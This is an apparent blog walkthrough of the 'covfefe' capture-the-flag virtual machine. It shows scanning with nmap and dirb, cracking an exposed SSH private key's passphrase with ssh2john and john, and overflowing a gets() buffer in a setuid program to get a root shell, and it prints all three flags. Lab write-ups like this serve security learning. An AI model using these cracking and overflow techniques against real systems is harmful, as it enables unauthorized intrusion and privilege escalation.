Press enter or click to view image in full size
In the beginning, I’d like to mention that this post is going to contain flags and steps to solve this box. I don’t want to ruin other people’s fun, I advise you to think harder and continue reading only if you’re truly out of ideas.
This box contains 3 flags, so let’s get them!
Scanning
Getting IP address from the machine.
root@kali:~# netdiscover -r 192.168.43.0/24Then, moving on to scanning the machine:
root@kali:~# nmap -A -O -p- 192.168.43.186--- snip ---
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
| 256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
|_ 256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA)
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-title: 404 Not Found--- snip ---
I considered port 80 as a dead end, because of no directories, literally nothing in there.
Get Mr. Robot’s stories in your inbox
Join Medium for free to get updates from this writer.
Nikto showed me nothing useful, so I went to check out those disallowed entries on port 31337 and I found the first flag under the taxes directory:
Good job! Here is a flag: flag1{make_america_great_again}
I just wanted to be sure there is nothing left, so I ran dirb on port 31337 and a hidden .ssh directory turned up.
Gaining access
I downloaded everything from the .ssh directory and it turned out from the key files, our user is “simon”. As password required for the private key, I had to crack it. The ssh2john is an excellent tool designed for this task and really easy to use.
root@kali:~# ssh2john id_rsa > resultOnly the cracking left with john:
root@kali:~# john result --format=ssh
Created directory: /home/username/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars (id_rsa)
1g 0:00:00:03 DONE 2/3 (2018-01-27 23:11) 0.2816g/s 3532p/s 3532c/s 3532C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completedUsing this information and the private key, I successfully logged in via SSH.
root@kali:~/Downloads# chmod 600 id_rsa
root@kali:~/Downloads# ssh -i id_rsa simon@192.168.43.86
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
I noticed in the .bash_history file that a read_message command was used. I executed the program and provided my name “Simon”.
simon@covfefe:~$ read_message
What is your name?
Simon
Hello Simon! Here is your message:Hi Simon, I hope you like our private messaging system.I'm really happy with how it worked out!If you're interested in how it works, I've left a copy of the source code in my home directory.- Charlie Root
Very informative message. I immediately headed to the root directory to check this source code out, which gave me:
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>// You're getting close! Here's another flag:
// flag2{use_the_source_luke}int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";printf("What is your name?\n");
gets(buf);// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}}
I’ve got my second flag:
flag2{use_the_source_luke}
Now, it was time to exploit the program. As you can see, the logic only compared the first 5 char and the buffer was 20 char. So after 20 char, I was able to execute a system shell as root by providing the full path to it.
simon@covfefe:/root$ read_message
What is your name?
Simonaaaaaaaaaaaaaaa/bin/sh
Hello Simonaaaaaaaaaaaaaaa/bin/sh! Here is your message:# whoami
root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
The box was finally rooted and the last flag was:
flag3{das_bof_meister}
Before you go…
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏